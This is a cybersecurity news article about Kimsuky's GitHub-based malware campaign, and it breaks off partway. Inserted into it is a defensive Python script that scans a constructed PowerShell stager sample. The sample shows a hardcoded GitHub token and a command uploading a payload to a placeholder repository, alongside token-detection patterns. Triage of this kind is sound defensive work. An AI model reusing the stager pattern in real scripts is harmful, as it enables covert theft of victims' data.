North Korean Hackers Weaponize GitHub Infrastructure to Distribute Malware
gbhackers
Cybersecurity researchers have uncovered a sophisticated spearphishing campaign orchestrated by the North Korean threat group Kimsuky, leveraging GitHub as a critical piece of attack infrastructure to distribute malware since March 2025.
This operation, identified through analysis of a malicious PowerShell script posted on X, showcases an alarming abuse of legitimate platforms like GitHub and Dropbox to host and disseminate malicious payloads, including the open-source XenoRAT.
Sophisticated Spearphishing Campaign
The attackers embedded hardcoded GitHub Personal Access Tokens (PATs) with repository scope in the malware, granting read and write access to private repositories used as command and control (C&C) infrastructure for storing malware, decoy files, and exfiltrated victim data.
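The defensive counterpart to this finding is static triage: before a suspicious PowerShell script is ever executed, extract any hardcoded GitHub token and the storage endpoints it talks to, so the token can be reported to GitHub for revocation and the repository and Dropbox URLs can be blocked. The script below is an added example, not code from the article or from the researchers' analysis; the PowerShell sample it scans is constructed to mimic the shape of such a stager (the token, owner, repo and Dropbox path are placeholders), and the fine-grained token format (`github_pat_` plus 82 characters) is assumed from GitHub's published prefix scheme. It never contacts GitHub and never uses the token.

```python
import re

# Constructed sample: the shape of a PowerShell stager that carries a
# hardcoded GitHub PAT and uses the GitHub API as a dead-drop. Not the real script.
SAMPLE_PS1 = r'''
$token = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"
$headers = @{ Authorization = "token $token"; "User-Agent" = "Mozilla/5.0" }
$repo = "https://api.github.com/repos/EXAMPLE-OWNER/EXAMPLE-REPO/contents/upload.txt"
Invoke-RestMethod -Uri $repo -Headers $headers -Method Put -Body $payload
$decoy = "https://www.dropbox.com/scl/fi/EXAMPLE/decoy.pdf?dl=1"
'''

# Classic PATs are "ghp_" + 36 alphanumerics; fine-grained PATs are
# "github_pat_" + 82 characters (assumed from GitHub's prefix scheme).
TOKEN_PATTERNS = [
    re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    re.compile(r"\bgithub_pat_[A-Za-z0-9_]{82}\b"),
]
GITHUB_REPO = re.compile(r"https://api\.github\.com/repos/([A-Za-z0-9_.-]+)/([A-Za-z0-9_.-]+)")
DROPBOX_URL = re.compile(r"https://(?:www\.)?dropbox\.com/[^\s\"'<>]+")
AUTH_HEADER = re.compile(r"Authorization\s*=\s*\"?(?:token|Bearer)\b")


def redact(token: str) -> str:
    """Keep enough of the token to match it in a revocation report, no more."""
    return token[:8] + "..." + token[-4:]


def triage(script: str) -> dict:
    """Static scan of a script body; returns indicators for blocking/revocation."""
    tokens = [m.group(0) for p in TOKEN_PATTERNS for m in p.finditer(script)]
    repos = [f"{o}/{r}" for o, r in GITHUB_REPO.findall(script)]
    return {
        "github_tokens": [redact(t) for t in dict.fromkeys(tokens)],
        "github_repos": list(dict.fromkeys(repos)),
        "dropbox_urls": list(dict.fromkeys(DROPBOX_URL.findall(script))),
        "uses_auth_header": AUTH_HEADER.search(script) is not None,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PS1).items():
        print(f"{key}: {value}")
```

A hit on `github_tokens` together with `uses_auth_header` is the signature described above: a script that authenticates to GitHub with a baked-in credential rather than merely downloading a public file.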

The attack begins with spearphishing emails tailored to specific South Korean targets, often impersonating trusted entities like law firms or financial authorities.
These emails contain password-protected archives with malicious attachments, designed ...
Copyright of this story solely belongs to gbhackers.